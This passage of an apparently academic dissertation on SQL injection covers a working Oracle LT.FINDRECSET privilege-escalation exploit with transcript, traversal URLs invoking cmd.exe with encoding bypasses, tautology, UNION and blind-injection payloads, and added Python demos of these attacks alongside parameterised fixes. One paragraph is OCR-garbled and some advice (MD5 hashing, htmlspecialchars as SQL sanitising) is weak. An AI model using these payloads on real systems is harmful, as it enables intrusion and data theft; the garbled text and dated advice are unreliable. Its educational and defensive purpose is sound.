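    # The comment swallows the closing quote and the admin row is the one updated.
    results["concat_rows_changed"] = change_password_concat(conn, attacker, "owned")
    results["second_order_admin_password"] = password_of(conn, "admin")
    results["second_order_attacker_password"] = password_of(conn, attacker)

    conn = new_db()
    register(conn, attacker, "attacker-pass")
    results["param_rows_changed"] = change_password_param(conn, attacker, "owned")
    results["param_admin_password"] = password_of(conn, "admin")
    results["param_attacker_password"] = password_of(conn, attacker)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The point of the second scenario is the one the section makes: the quote-doubling limiter keeps the INSERT intact, yet the value it stores is exactly the text the attacker typed, so any later query that trusts "data from our own database" and concatenates it is injectable. Binding the value as a parameter in every query, not only at the first entry point, is what removes the problem.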
Below an example of the ltfindrecset.sql LT.FINDRECSET exploit and function can be found:

CONNECT MAN/TIGER@orcl
SET SERVEROUTPUT ON
CREATE OR REPLACE FUNCTION MYFUNC RETURN VARCHAR2 AUTHID CURRENT_USER IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  DBMS_OUTPUT.PUT_LINE('In function...');
  EXECUTE IMMEDIATE 'GRANT DBA TO MAN';
  COMMIT;
  RETURN 'STR';
END;
/

A low privileged user is able to grant themselves DBA privileges. This can be done because the SYS.LT.FINDRECSET procedure does not parse out user inputted SQL:

EXEC SYS.LT.FINDRECSET('AA.AA''||MAN.MYFUNC)--','BBBB');

SQL> select * from v$version;

BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - 64bit
PL/SQL Release 10.1.0.2.0 - Production
CORE    10.1.0.2.0      Production
TNS for Solaris: Version 10.1.0.2.0 - Production
NLSRTL Version 10.1.0.2.0 - Production

SQL> conn MAN/tiger@orcl
Connected.
SQL> SET SERVEROUTPUT ON
SQL> CREATE OR REPLACE FUNCTION MYFUNC RETURN VARCHAR2 AUTHID CURRENT_USER IS
  2  PRAGMA AUTONOMOUS_TRANSACTION;
  3  BEGIN
  4    DBMS_OUTPUT.PUT_LINE('In function.');
  5    EXECUTE IMMEDIATE 'GRANT DBA TO MAN';
  6    COMMIT;
  7    RETURN 'STR';
  8  END;
  9  /

Function created.

SQL> select * from user_role_privs;

USERNAME   GRANTED_ROLE   ADM  DEF  OS_
---------- -------------- ---- ---- ---
MAN        CONNECT        NO   YES  NO
MAN        RESOURCE       NO   YES  NO

SQL> EXEC SYS.LT.FINDRECSET('AA.AA''||MAN.MYFUNC)--','BBBB');
In function.
AA.AASTR

PL/SQL procedure successfully completed.

SQL> select * from user_role_privs;

USERNAME   GRANTED_ROLE   ADM  DEF  OS_
---------- -------------- ---- ---- ---
MAN        CONNECT        NO   YES  NO
MAN        DBA            NO   YES  NO
MAN        RESOURCE       NO   YES  NO

The procedure SYS.LT.FINDRECSET runs with Definer privileges, therefore code run in this package is running with the privileges of the account that owns the package. A common method to get control of an Oracle database is to exploit a weak password account and escalate privilege to DBA via PL/SQL injections.

3.1.7 Dynamic query

Stored procedures are interfaces used as a data interface between the user input and the SQL database. This way the data that reach the database are being "checked" for validity, and access rights are being adjusted. For a long time this methodology has been the most efficient way for giving input to databases. This is called a "locked down database". In this case the access to the database (and the length of the input, sometimes) has to be validated beforehand. This kind of stored procedure can only work provided that the type of the stored procedure input allows this validation to be functional. For this, the stored procedures and the database tables need to have the same type of access rights on the database, via ownership chaining. However dynamic SQL is not a procedure, i.e. there is no owner defined for it. In this case the ownership chain cannot be functional. In SQL Server 2005 this issue is resolved with the use of a certificate to sign a procedure that uses dynamic SQL. This certificate is assigned to a user, making the ownership chain possible and functional again. Another way to overcome that obstacle is making the EXECUTE AS clause have user permissions which therefore can be chained. Below there are two examples on how to write a stored procedure that takes a table name as its input [10]:

CREATE PROCEDURE general_select1 @tblname sysname, @key varchar(10) AS
DECLARE @sql nvarchar(4000)
SELECT @sql = ' SELECT col1, col2, col3 ' + ' FROM dbo.' + quotename(@tblname) + ' WHERE keycol = @key'
EXEC sp_executesql @sql, N'@key varchar(10)', @key

CREATE PROCEDURE general_select2 @tblname nvarchar(127), @key varchar(10) AS
EXEC('SELECT col1, col2, col3 FROM ' + @tblname + ' WHERE keycol = ''' + @key + '''') [16]

In these examples table names are given as parameters, which is something to avoid in general. Though the first procedure is granted dbo rights, the second one is not, and this could be a problem in the case of dynamic SQL.

3.1.8 Canonicalisation errors

Canonicalisation is converting input characters into their standard form, i.e. ASCII, hexadecimal or Unicode. This form is called the canonical form. E.g. for the \ (backslash) the 3 different canonical representation forms that can be used are the following: \ in ASCII, %2f in hexadecimal or %c0%af in Unicode. A set of characters usually suspect for SQL injection and blocked in most of the cases is the URL Directory Traversal sequence ../ An example could be the following:

http://10.154.193.219/man/../../../../winnt/system32/cmd.exe?/c+dir

This URL would be blocked by a server because it has ../ characters, but the following form could be allowed if no canonicalisation conversion is made before filtering:

http://10.154.193.219/man/..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir

Other characters that make canonical form injection possible can be found in the table below [17]:

Table 11-1: The Different Types of Overlong UTF-8 Characters Possible for / and \

Escape        Comment
%c0%af        2-byte overlong UTF-8 escape
%e0%80%af     3-byte overlong UTF-8 escape
%252f         Double-escape; %25 is an escaped % character
%%35c         Double-escape; %35 is an escaped 5 character
%25%35%63     Double-escape, where every character in %5c is escaped
%%35%63       %, then escaped 5 and escaped c
%255c         Escape %, then 5c
%u005c        2-byte Unicode escape

3.1.9 Differences between databases

Differences between databases with regard to character interpretation and supported functions (source: OWASP [21]):

Some differences     MS SQL (T-SQL)   MySQL                            Access          Oracle (PL/SQL)   DB2                        Postgres (PL/pgSQL)
Concatenate strings  ' '+' '          concat(" "," ")                  " "&" "         ' '||' '          " "+" "                    ' '||' '
Null replace         Isnull()         Ifnull()                         Iff(Isnull())   Ifnull()          Ifnull()                   COALESCE()
Position             CHARINDEX        LOCATE()                         InStr()         InStr()           InStr()                    TEXTPOS()
Op Sys interaction   xp_cmdshell      select into outfile / dumpfile   #date#          utl_file          import from / export to    Call
Cast                 Yes              No                               No              No                Yes                        Yes

More differences           MSSQL   MySQL           Access   Oracle   DB2    Postgres
UNION                      Y       Y               Y        Y        Y      Y
Subselects                 Y       4.0 N / 4.1 Y   N        Y        Y      Y
Batch Queries              Y       N*              N        N        N      Y
Default stored procedures  Many    N               N        Many     N      N
Linking DBs                Y       Y               N        Y        Y      N

4 TOOLS FOR ATTACKS IMPLEMENTATION

Manual testing for SQL injection used to be the only way to determine the vulnerability level of a database. Testing took great effort to be performed: guessing the database structures and parameters, exploiting error messages and possible weaknesses, knowing the code which had been implemented. In many cases testers were stuck on this kind of testing through wild guesses, and luck was always a factor as well.
This had as a result big coding errors being overlooked, as the functionality was not always the first priority. Since then many automated SQL injection tools have been developed, performing SQL attacks in a systematic way, checking not only the newly developed threats but "legacy" threats as well, in a bulk that would take too much effort for a manual tester to perform. Those scripts can test both the web application and the database part. Usually such tools perform a first level of harmless testing, creating attacks that will not destroy anything on the system, providing the user with input to correct "easy to see" problems. For example, a simple query on a telephone directory. Having the URL format:

http://mysite.com/directory.asp?lastname=paraskevakis&firstname=manolis

This URL could lead to the SQL code execution:

SELECT phone FROM directory WHERE lastname = 'paraskevakis' and firstname = 'manolis'

A slightly altered version of the "correct" URL could be the following:

http://mysite.com/directory.asp?lastname=paraskevakis&firstname=manolis'+AND+(select+count(*)+from+fake)+%3e0+OR+'1'%3d'1

leading to the execution of the SQL code below:

SELECT phone FROM directory WHERE lastname = 'paraskevakis' and firstname = 'manolis' AND (select count(*) from fake) > 0 OR '1'='1'

In this example the URL-encoded (%xx) characters are replaced by their ASCII equivalents, i.e. %3d by '='. Sampling attacks like the one above cannot provide a systematic and full solution. Automated attacks running different patterns of attacks shall be run, providing either information that a vulnerability exists or even securing functionality like sanitization solutions.
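Returning to the canonicalisation errors of 3.1.8: the bypass there works because the filter looks at the raw request while the server decodes later. The following Python is an added example written for this edit (not code from the dissertation or the sources it cites) showing the defensive ordering: decode first, repeatedly, with a decoder that accepts the overlong UTF-8 forms from Table 11-1, and only then apply the traversal check. The sample paths are constructed and the file names in them are placeholders.

```python
# Canonicalising URL path segments before applying a traversal filter.
HEX_DIGITS = "0123456789abcdefABCDEF"


def percent_decode(text):
    """One pass of %XX (and IIS-style %uXXXX) decoding, returning raw bytes."""
    out = bytearray()
    i, n = 0, len(text)
    while i < n:
        ch = text[i]
        if ch == "%":
            if i + 2 < n and text[i + 1] in HEX_DIGITS and text[i + 2] in HEX_DIGITS:
                out.append(int(text[i + 1:i + 3], 16))
                i += 3
                continue
            if i + 5 < n and text[i + 1] in "uU" and all(c in HEX_DIGITS for c in text[i + 2:i + 6]):
                out += chr(int(text[i + 2:i + 6], 16)).encode("utf-8", "replace")
                i += 6
                continue
        out += ch.encode("utf-8")   # a lone % or an ordinary character is kept as is
        i += 1
    return bytes(out)


def lenient_utf8(data):
    """UTF-8 decoder that also accepts overlong sequences (a strict decoder rejects
    them), so %c0%af and %e0%80%af both come out as '/', the way a lax
    server-side decoder would see them."""
    out = []
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
            continue
        if 0xC0 <= b <= 0xDF:
            need, cp = 1, b & 0x1F
        elif 0xE0 <= b <= 0xEF:
            need, cp = 2, b & 0x0F
        elif 0xF0 <= b <= 0xF7:
            need, cp = 3, b & 0x07
        else:                       # stray continuation byte or invalid lead byte
            out.append("\ufffd")
            i += 1
            continue
        tail = data[i + 1:i + 1 + need]
        if len(tail) != need or any(t & 0xC0 != 0x80 for t in tail):
            out.append("\ufffd")
            i += 1
            continue
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += 1 + need
    return "".join(out)


def canonical_form(text, max_passes=3):
    """Decode repeatedly until the value stops changing (covers double escapes)."""
    for _ in range(max_passes):
        decoded = lenient_utf8(percent_decode(text))
        if decoded == text:
            break
        text = decoded
    return text


def naive_traversal_check(path):
    """Filter applied to the raw request, as in the blocked-URL example above."""
    return "../" in path


def canonical_traversal_check(path):
    """Filter applied after canonicalisation; backslashes count as separators."""
    canon = canonical_form(path).replace("\\", "/")
    return "../" in canon or canon.endswith("/..")


SAMPLE_PATHS = [   # constructed requests; the encodings follow Table 11-1
    "/images/../../config.ini",
    "/images/..%c0%af..%c0%afconfig.ini",
    "/images/..%252f..%252fconfig.ini",
    "/images/..%255c..%255cconfig.ini",
    "/images/logo%2epng",
]


def report(paths=SAMPLE_PATHS):
    """(path, blocked by naive filter, blocked by canonicalising filter) per path."""
    return [(p, naive_traversal_check(p), canonical_traversal_check(p)) for p in paths]


if __name__ == "__main__":
    for path, naive, canon in report():
        print(f"{path:45} naive={naive!s:5} canonical={canon}")
```

Only the first, plainly written path is caught by the raw-text filter; the three encoded variants pass it and are rejected only once canonicalised, while the harmless %2e in a file name is correctly left alone by both. The same ordering (decode to one canonical form, then validate) is what the section asks for whenever input is filtered by pattern.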
4.1 Tools classification

Database attack tools can be classified depending on the use intended for them as:

• Web Application Vulnerability Scanner Tools
• Binary Analysis Tools
• Web Services Tools
• Static Analysis Security Tools
• Network Tools [24]

Depending on approach and functionality:

• Life Cycle Process (requirements, design)
• Automation (manual, semi, automatic)
• Approach (preclude, detect, mitigate, react, appraise)
• Other (price, platform, languages, ...)

4.2 Evaluating the Results

In the example used before:

http://mysite.com/directory.asp?lastname=paraskevakis&firstname=manolis'+AND+(select+count(*)+from+fake)+%3e0+OR+'1'%3d'1

the web application shall remove the single quotes. If this is not done then the database will execute the injected SQL commands too, together with this query. If this is done then an error message will appear:

Error: No user found with name manolis+AND+(select+count(*)+from+fake)+%3e0+OR+1%3d1 paraskevakis!

If the statement is passed for execution to the SQL server then one of the following error messages may appear: one detailed, passing information to the attacker, like:

Microsoft OLE DB Provider for ODBC Drivers error '80040e37'
[Microsoft][ODBC SQL Server Driver][SQL Server]Invalid object name 'fake'.
/directory.asp, line 29

and one generic, like:

500 Internal Server Error

Both kinds of error messages mean that an SQL vulnerability exists on the application and stored procedures are not being used on the SQL part. Countermeasures to be taken:

• Data validation of all input, covering data type and length.
• Limitation of the permissions of the account executing database queries. The less privileged the user accounts are, the better. If the account doesn't have permission to execute the query it is used to execute, it will not succeed!
• Use stored procedure interfaces to act between the application and the SQL part.
4.3 Vulnerability scanning tools

There are many tools used for SQL injection attacks, either developed for hacking purposes or for security evaluation purposes, which are either commercial or freeware. The SQL injection issue has been addressed by many major software companies, which have provided solutions like: AppScan DE by Watchfire, Inc. (IBM) (URL: www.ibm.com/software/awdtools/appscan/), Hailstorm (URL: www.microsoft.com/presspass/features/2001/mar01/03-19hailstorm.mspx), W3AF (URL: w3af.sourceforge.net), Grabber (URL: www.rgaucher.info/beta/grabber), Paros (URL: www.parosproxy.org/functions.shtml), N-Stealth Security Scanner (URL: http://www.nstalker.com/eng/products/nstealth/), Acunetix Ltd.'s Web Vulnerability Scanner (URL: http://www.acunetix.com/vulnerability-scanner/) and SPI Dynamics (HP) WebInspect (URL: http://www.spidynamics.com/products/webinspect/index.html). Free tools like Wikto (URL: http://www.sensepost.com/research/wikto/) can often find these vulnerabilities as well. Another tool is Sleuth (URL: http://sandsprite.com/Sleuth/download.html) equipped with an SQL injection plug-in. WebGoat [27] is a deliberately insecure J2EE web application maintained by OWASP, designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application.

4.4 Common tool features:

• Automatic JavaScript analyzer allowing for security testing
• SQL injection and Cross Site Scripting testing
• Visual macro recorder makes testing web forms and password protected areas easy
• Reporting facilities
• Automatic application language detection
• Flash content, SOAP and AJAX context analysers
• Authentication and access control weaknesses, Path manipulation, Improper error handling
• VISA PCI compliance reports

Detection of these web vulnerabilities requires a sophisticated detection engine. What is important to vulnerability scanning is not the number of attacks that a scanner can detect, but the complexity and thoroughness with which the scanner launches SQL injection, Cross Site Scripting and other attacks. Another issue is the Google Hacking Database: the Google Hacking Database (GHDB) is a database of queries used by hackers to identify sensitive data on your website such as portal logon pages, logs with network security information, and so on. Some of the tools launch the Google hacking database queries onto the crawled content of a web site and identify sensitive data or exploitable targets before a "search engine hacker" does. These tools can also offer (depending on the manufacturer and the edition):

• HTTP Editor to easily construct HTTP/HTTPS requests and analyze the web server response.
• HTTP Sniffer (like Wireshark (URL: www.wireshark.org)) to intercept, log and modify all HTTP/HTTPS traffic and reveal all data sent by a web application.
• HTTP Fuzzer, performing sophisticated testing for buffer overflows and input validation.
• Creating custom attacks or modifying existing ones.
• Detecting if dangerous HTTP methods are enabled on your web server.

Tests that would have taken days to perform manually this way take only some minutes. An example of two different SQL injection vulnerabilities discovered by WebInspect is shown in the figure below:

[Figure: two SQL injection vulnerabilities discovered by WebInspect] [22]

Step 1: Beginning of SQL injection

Once it has been determined whether or not a system is vulnerable to SQL injection, the next step is to carry out the SQL injection process. This has to be done in a way which will not harm the actual database, e.g. by dropping tables. The tools to execute automated tests shall not only be able to find security holes but also prevent damaging the databases while testing. Such a tool for automating the actual SQL injection process is SPI Dynamics' SQL Injector (which comes as part of WebInspect). Also the Absinthe tool can be used (URL: http://www.0x90.org/releases/absinthe/), shown in the figure below:

[Figure: the Absinthe tool, used to automate SQL injection analysis] [22]

Both tools allow testing for blind and basic SQL injection flaws. Of course both types of injection testing are necessary. Those tools also use an automated reporting interface, providing logs at the end of each run. Another tool is Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC; it is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities.
It can provide the type of backend database in use and a list of available table names.

Technical details for Scrawlr [26]:

• Identify Verbose SQL Injection vulnerabilities in URL parameters
• Can be configured to use a Proxy to access the web site
• Will identify the type of SQL server in use
• Will extract table names (verbose only) to guarantee no false positives

Scrawlr does have some limitations:

• Will only crawl up to 1500 pages
• Does not support sites requiring authentication
• Does not perform Blind SQL injection
• Cannot retrieve database contents
• Does not support JavaScript or Flash parsing
• Will not test forms for SQL Injection (POST Parameters)

Issues with web application scanning tools:

• Tools are limited in scope (companies sell service as opposed to selling the tool)
• Speed versus Depth (in-depth testing takes time)
• Difficult to read output reports (typically log files)
• False-Positives
• Tuning versus default mode

5 LESSONS LEARNED, WAYS TO PROTECT FROM SQL INJECTIONS

5.1 General steps for SQL injection prevention

The first step performed in protecting from SQL injections is to determine the data exchanges between the database and the Web application. Such data exchanges usually take place:

• For user authentication purposes. In this case the input data has to be checked for containing malicious strings which could cause code injection to the database.
• In search engines. In this case the usually long query lengths pose a security breach possibility, because when the length is big enough, malicious code that can be injected into the database can be present.
• In e-commerce sites. The same problem as for databases applies to the e-commerce sites as well: big queries, containing many parameters (usually product names and characteristics).
Sanitising the data provided to the SQL and securing the applications interfacing between the end user and the database is the way to avoid SQL injections. Measures have to be taken in both the database and the interface part. In the Figure below an input sanitization schematic diagram is shown (made for a specific sanitization toolkit, AMNESIA [31]):

[Figure: AMNESIA toolset. Static Phase (Static Analysis): Web Application -> Analysis Module -> SQL-Query Model; Instrumentation Module -> Instrumented Web Application. Dynamic Phase (Runtime Monitoring): Browser/Application -> URL -> Instrumented Web Application -> Runtime Monitoring Module -> legitimate data -> Database; HTML back to the user] [31]

In the database part a quote should be prefixed and appended to all the user input, even if the data is numeric. The rights of the database user shall also be limited. Access to all of the system stored procedures should not be granted if that user only needs access to some user-defined procedures. Tools and automated procedures shall be used to test and evaluate user input and database integrity. Also all other security topologies (secure network rules, IDS, filters, antivirus scanners) shall be applied.

5.2 Input sanitization

Input sanitization in the case of PHP applications will be considered in this chapter. Conclusions are applicable to other applications also. Sanitisation is removing from the user input all the possibly harmful code, and Validation is the checking of the data input in terms of format. User input data that hasn't been validated or sanitised can at least cause unnecessary database load, because many of the queries that reach the database would have otherwise been rejected beforehand. Of course the other big issue is the security one, in terms of SQL injection.

In the case of username/password input, a simple PHP header input form code would look like:

<?php
// connection to MySQL server
mysql_connect('localhost', 'username', 'password');
mysql_select_db('database');

// user input
$username = $_POST['username'];
$password = md5($_POST['password']);

// construct and run query.
$sql = 'SELECT id FROM users WHERE username="' . $username . '" AND password="' . $password . '"';
$result = mysql_query($sql);

// If there is a user, log them in.
if (mysql_num_rows($result) > 0) {
    $_SESSION['login'] = true;
    // Redirect to admincp
    header('Location: http://somesite.com/admincp/');
} else {
    die('Incorrect username or password.');
}
?> [30]

The code above checks username and password in the database and logs in users accordingly. If the username field became:

" OR password LIKE "%" --

then the query turns to:

SELECT id FROM users WHERE username="" OR password LIKE "%" -- " AND password="9cdfa439c7876e703e307864c9167a15" [30]

The result of the query above is that LIKE "%" matches all rows and -- comments out everything behind it, i.e. all users are retrieved and therefore one can log in successfully to the database, regardless of the username and password. A first countermeasure for this is stripping ' and -- out of the SQL query. SQL functions like mysql_real_escape_string() can be used. By those means the input will be as below:

<?php
// connection to MySQL server
mysql_connect('localhost', 'username', 'password');
mysql_select_db('database');

// user input
$username = mysql_real_escape_string($_POST['username']); // sanitised input
$password = md5($_POST['password']);                       // already safe due to md5()

// Construct and run query.
$sql = 'SELECT id FROM users WHERE username="' . $username . '" AND password="' . $password . '"';
$result = mysql_query($sql);
// etc...
?> [30]

The query finally reaches the database in the form:

SELECT id FROM users WHERE username="\" OR password LIKE \"%\" -- " AND password = "9cdfa439c7876e703e307864c9167a15" [30]

This input is now harmless for SQL. The password has not been sanitized by mysql_real_escape_string() because the variable $password is hashed. The $password will be sanitized by the (MD5 in this case) hashing algorithm. As the only values returned by hashing algorithms are (for the most part) hex ones, no character able to execute injected SQL commands can be inserted (hex values include the alphanumeric values 0-9 and a-f).

Another sanitization form is typecasting. For a query that allows users to insert an offset for data displaying:

<?php
// code...
$sql = 'SELECT id,title FROM news LIMIT ' . $_GET['offset'] . ', 10';
$result = mysql_query($sql);
// more code...
?> [30]

The $_GET variable can be sanitised the same way the previous query was sanitised, but as this variable is of integer value, we can use this to impose a rule that every input for this variable will have to be an integer before the query is passed on to the database. This form of sanitisation is called typecasting. The intval() function can be used for this purpose. intval takes a variable and returns its integer value: "15" will be returned as the integer number 15, and anything besides a number will take the value of 0.

<?php
// code...
$sql = 'SELECT id,title FROM news LIMIT ' . intval($_GET['offset']) . ', 10'; // sanitised input
$result = mysql_query($sql);
// more code...
?>

If the output of a query is to be used as an input for another query then the output data will have to be sanitised as well.
A script that has as an input a $_GET variable called "name" then outputs "Hello, [name]!". If both input and output are not sanitised, malicious code can be injected in another query for input. In PHP a function for data sanitisation has been developed, named htmlspecialchars(). This function replaces SQL prone characters like < with their HTML entities. In this case < would be transcribed as &lt;. Usage syntax of the function can be seen below:

<?php
echo 'Dear, ', htmlspecialchars($_GET['input'], ENT_QUOTES), '!';
?>

5.3 SQL Injection Detection, database part

All possible SQL injection threats have to be tested separately, in many kinds of queries, and provoke possible errors. First in the row are characters like ' (string terminator) or ; (end of a query). Also the comment-out characters -- are to be tested. During the testing procedure all testing parameters except one shall be constant, while all variations of the one tested shall be tried. POST, AND, OR clauses are to be tested too, while the input type shall be examined in any case where the input variable is a number.

5.4 Standard SQL Injection Testing

Consider the following SQL query:

SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password'))) [1]

In cases like the one above the query will not be completed unless a value is returned as a password. If the variables declaration is as follows:

$username = 1' or '1' = '1'))/*    (/* used as a comment-out symbol)
$password = 123

everything after the username value will be considered as a comment, i.e.
in a SQL query of the form:

SELECT * FROM Users WHERE ((Username='1' or '1' = '1'))/*') AND (Password=MD5('$password')))

The URL form will be:

http://www.anysite.any/index.php?username=1'%20or%20'1'%20=%20'1'))/*&password=123

This query is actually returning results. In cases where applicable we have to verify also the number of the output results, especially if that number is 1. This can be performed using the LIMIT operation. The previous example would look like:

$username = 1' or '1' = '1')) LIMIT 1/*
$password = 123

Corresponding URL:

http://www.anysite.any/index.php?username=1'%20or%20'1'%20=%20'1'))%20LIMIT%201/*&password=123

5.5 Union Query SQL Injection Testing

UNION operation functionality has to be tested for possible SQL injection attack vulnerabilities. By this operation the results of two queries are merged. An SQL injection tester shall find out whether an attacker could retrieve more values than the queries are supposed to allow, with the injection of UNION commands. A simple query like the one below:

SELECT Name, Tel, Address FROM Users WHERE Id=$id

can be modified if the variable $id is combined with UNION SELECT:

$id=1 UNION ALL SELECT Account,1,1 FROM CreditCarTable

which will provide the query:

SELECT Name, Tel, Address FROM Users WHERE Id=1 UNION ALL SELECT Account, 1, 1 FROM AccountTable

The query above will provide, apart from the users' Name, Telephone and Address, also the Account number. All this searching requires knowledge of the database naming conventions and structure, but this, as we have seen in the previous chapter, is something that can be obtained by an attacker.

5.6 Blind SQL Injection Testing

If attackers performing SQL injection attacks have no other clue to reach a database, e.g.
tl1e eιτοl' ιηessagcs do not give a11y (In cases jιιst a 500 ιηοst peι-foΓm Inteωal serveι· eηΌΙ" at all message) aboιιt theiΓ the database stιυctuΓe only option is to blind attacks on the database. The n1ethod consists in caπying out a seΓies of booloean ιηcaning infonηati on qιιeries of such to tl1e seι·νeΓ, obseΓνing tl1e answe!'s and tinally deducing tl1e answeι·s[ 1] Supρosly a database contains the ρaraιηeteι· id. The fol!owing U.RL: !1ttp: //www.anysite.any/index.ρlψ?id= Ι' could (sιιpposly) result to tl1e following queιγ: SELECT name, addι·ess, tel FROM UseΓs WHERE Id='$Id' Whic\1 acco.-ding to what l1as been analysed in the SQL injection vιιlneΓabilities. CeΓtajn ιιscιηame fίeld. ιπeνiοιιs chaptel' can be pΙΌne to SQL functions need to be used to exι ι·act tl1e In this case tl1e pseudo-fιιnctions: SUBSTRING (text, staΓt, Jengtl1): Retuιηs a sιιbstι·ing staΓting f1Όn1 tl1e position "staι·t" of text and o-f lengtl1 'Ίe11gtl1". If sta.-t > Jength 11otl1ing is being ι·etιιιηed. ASCIJ (cl1ar): LENGTI 1(text): T11ose tΊιnctions ι·etιιιηs Γetιιιηes ASCII valιιe of input. the le11gth od the inpιιt. will be iteι·atively execιιted revealing the ιιseιηame cl1aracter by cl1aΓacte.- i.e. one cl1aΓacter at a time will be selected witl1 SUBSTRfNG, tl1e cl1aracteι· wi!I be tJ1e11 ι·eplaced wiιh tl1e coπesponding ASCII va!ue, using tl1e ASCII functio11, and ιl1 e ι·esιι!t will be coιηaΓed witl1 the desiΓed va!ue. 
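The tests of 5.4 (tautology plus comment), 5.5 (UNION) and the character-by-character extraction described in this section, run end to end as an added example; this code is not from the dissertation. It uses Python's built-in sqlite3 module with an in-memory database standing in for the page's Users and AccountTable tables. The sample rows, the extra columns, the helper names (make_db, login_vulnerable, login_safe, lookup_vulnerable, lookup_safe, blind_page, blind_extract) and the printable-ASCII search range are assumptions; MySQL's MD5(), ASCII() and SUBSTRING() are emulated with user-defined SQLite functions so the page's queries can be kept verbatim. Each string-built query is shown beside its parameterised form, and the blind extractor returns the number of requests it needed, which is the query-volume point this section makes.

```python
"""Added example (not from the dissertation): sections 5.4, 5.5 and 5.6
run against an in-memory SQLite stand-in for the page's Users and
AccountTable tables.  Rows, extra columns and helper names are
constructed assumptions; MySQL's MD5(), ASCII() and SUBSTRING() are
registered as user functions so the page's queries stay verbatim."""
import hashlib
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    # Emulate the MySQL functions the page's queries rely on.  ASCII('')
    # returns 0 as in MySQL; the blind test's end-of-string rule depends on it.
    conn.create_function("MD5", 1, lambda s: hashlib.md5(str(s).encode()).hexdigest())
    conn.create_function("ASCII", 1, lambda s: ord(s[0]) if s else 0)
    conn.create_function("SUBSTRING", 3, lambda s, start, n: s[start - 1:start - 1 + n])
    conn.executescript("""
        CREATE TABLE Users (Id INTEGER, Username TEXT, Password TEXT,
                            Name TEXT, Tel TEXT, Address TEXT);
        CREATE TABLE AccountTable (Account TEXT);
        INSERT INTO AccountTable VALUES ('4111-1111-1111-1111');
    """)
    for uid, user, pw, name, tel, addr in [
            (1, "alice", "s3cret", "Alice", "555-0101", "1 Main St"),
            (2, "bob", "hunter2", "Bob", "555-0102", "2 High St")]:
        conn.execute("INSERT INTO Users VALUES (?,?,?,?,?,?)",
                     (uid, user, hashlib.md5(pw.encode()).hexdigest(), name, tel, addr))
    return conn


# 5.4: the login query with values pasted into the SQL text, and parameterised.
def login_vulnerable(conn, username, password):
    sql = ("SELECT * FROM Users WHERE ((Username='%s') AND (Password=MD5('%s')))"
           % (username, password))
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    # Placeholders keep the quote and the comment marker inside the value.
    sql = "SELECT * FROM Users WHERE ((Username=?) AND (Password=MD5(?)))"
    return conn.execute(sql, (username, password)).fetchall()


# 5.5: the lookup query that a UNION payload turns into a dump of another table.
def lookup_vulnerable(conn, id_value):
    sql = "SELECT Name, Tel, Address FROM Users WHERE Id=%s" % id_value
    return conn.execute(sql).fetchall()


def lookup_safe(conn, id_value):
    sql = "SELECT Name, Tel, Address FROM Users WHERE Id=?"
    return conn.execute(sql, (id_value,)).fetchall()


# 5.6: a page that leaks only "row or no row", and the inference loop.
def blind_page(conn, id_value):
    """Stand-in for index.php?id=...: True if any row comes back, False on an
    empty result or a database error (the '500 Internal Server Error' case)."""
    sql = "SELECT name, address, tel FROM Users WHERE Id='%s'" % id_value
    try:
        return bool(conn.execute(sql).fetchall())
    except sqlite3.Error:
        return False


def blind_extract(oracle, column="username", row_id="1", max_len=32):
    """Recover `column` of row `row_id` one character at a time, as in 5.6.
    Returns (value, number_of_requests) so the query volume is visible."""
    count = [0]

    def ask(payload):
        count[0] += 1
        return oracle(payload)

    # The always-false reference response the page compares against.
    if ask("%s' AND '1' = '5" % row_id):
        raise RuntimeError("reference query was not false; page does not behave as assumed")
    # Fix the length first (page: LENGTH(username)=i), then search each position.
    length = next(n for n in range(1, max_len + 1)
                  if ask("%s' AND LENGTH(%s)=%d AND '1'='1" % (row_id, column, n)))
    value = ""
    for pos in range(1, length + 1):
        for code in range(32, 127):  # printable ASCII only
            if ask("%s' AND ASCII(SUBSTRING(%s, %d, 1))=%d AND '1'='1"
                   % (row_id, column, pos, code)):
                value += chr(code)
                break
    return value, count[0]


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "1' or '1' = '1'))/*", "123"))          # both users
    print(login_vulnerable(db, "1' or '1' = '1')) LIMIT 1/*", "123"))  # one row
    print(login_safe(db, "1' or '1' = '1'))/*", "123"))                # []
    print(lookup_vulnerable(db, "1 UNION ALL SELECT Account,1,1 FROM AccountTable"))
    print(blind_extract(lambda p: blind_page(db, p)))                  # ('alice', ...)
```

The unterminated /* is accepted by SQLite up to the end of the input; other engines differ, which is why the page recommends trying each comment marker. The parameterised variants return nothing for the same payloads because the whole value, quotes and comment marker included, is bound as data rather than parsed as SQL.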
To test whether the first character has the ASCII value 44, the string to execute is

    $Id=1' AND ASCII(SUBSTRING(username, 1, 1))=44 AND '1'='1

which executes the following SQL:

    SELECT name, address, tel FROM Users WHERE Id='1' AND ASCII(SUBSTRING(username, 1, 1))=44 AND '1'='1'

If the ASCII value of the first character of the username field is equal to 44 then the statement is true, therefore the first character of the username has been found; if not, we move on to the next iteration with the next candidate value. A question that arises is how a test that has returned a true value is differentiated from one that has returned a false value. In order to do this we perform a query for the field id which is always false:

    $Id=1' AND '1' = '5

which leads to the following SQL:

    SELECT name, address, tel FROM Users WHERE Id='1' AND '1' = '5'

